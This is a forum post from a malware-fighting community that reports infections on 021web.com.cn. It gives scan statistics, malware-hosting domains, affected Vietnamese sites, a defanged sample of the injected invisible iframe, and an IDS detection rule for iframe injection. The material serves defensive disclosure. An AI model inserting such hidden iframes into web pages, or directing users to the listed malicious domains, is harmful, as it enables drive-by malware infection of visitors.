Hi malware fighters,
See unmasked pirates report for 021web*com*cn
Of the 217 pages we tested on the site 2 pages resulted in malicious software being downloaded and installed without user consent. The last time suspicious content was found on this site was on 2010-07-04.
Malicious software includes 1116 exploits, 1101 scripting exploits, 5 trojans. Successful infection resulted in an average of 6 new processes on the target machine.
Malicious software is hosted on 11 domains, including dwefsd.com/, 92mimi4.cn/, wdf345.3322.org/.
This site was hosted on 1 network including AS4812 (CT).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 021web.com.cn appeared to function as an intermediary for the infection of 246 site(s) including vannghevietnam.vn/, dongnai.gov.vn/, 1081.com.vn/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 185 domains, including vannghevietnam.vn/, dongnai.gov.vn/, vietbalo.vn/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Infection details: Infection Details
MD5: 873fab89c387bd0d2225a5689f152e81
Infection Type: IFRAME
Description: A malicious IFRAME can source in content from web pages that attempt to fingerprint and exploit a browser vulnerability or client/OS vulnerability to cause a drive-by-download. Such IFRAMEs are typically invisible to users.
Code Length: 75 bytes
Code Sample:
Top-level URL <iframe src=htxp://021web.com*cn/abo
ut.html width=0 height=0>
=== Triggered rule ===
alert(url_content:"%3Ciframe"; nocase; msg:"<iframe> tags GET request cross site scripting attempt"; url_re:"/%3Ciframe.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=Infection+Details++MD5%3A+%09873fab89c387bd0d2225a5689f152e81+Infection+Type%3A+%09IFRAME+Description%3A+%09A+malicious+IFRAME+can+source+in+content+from+web+pages+that+attempt+to+fingerprint+and+exploit+a+browser+vulnerability+or+client%2FOS+vulnerability+to+cause+a+drive-by-download.+Such+IFRAMEs+are+typically+invisible+to+users.+Code+Length%3A+%0975+bytes+Code+Sample%3A+%09+Top-level+URL+%3Ciframe+src%3Dhttp%3A%2F%2F021web.com.cn%2Fabo+ut.html+width%3D0+height%3D0%3E&ie=utf-8&oe=utf-8&aq=t If you give in this request -it is flagged by avast as: S:ScriptPE-inf [Trj]
iFrame detecting scan:
No zeroiframes detected!
Check took 11.38 seconds
(Level: 0) Url checked:
htxp://021web.com.cn
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
htxp://021web.com.cn/template/index_js.html
Blank page / could not connect
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://021web.com.cn/js/mainad.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
hxtp://021web.com.cn//count/get_count.asp?action=all
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (script source)
htxp://s27.cnzz.com/stat.php?id=602762&web_id=602762 (suspicious code see attached image)
Zeroiframes detected on this site: 0
No ad codes identified
Avast Networkshield is your friend and protector here, because we cannot connect there:
polonus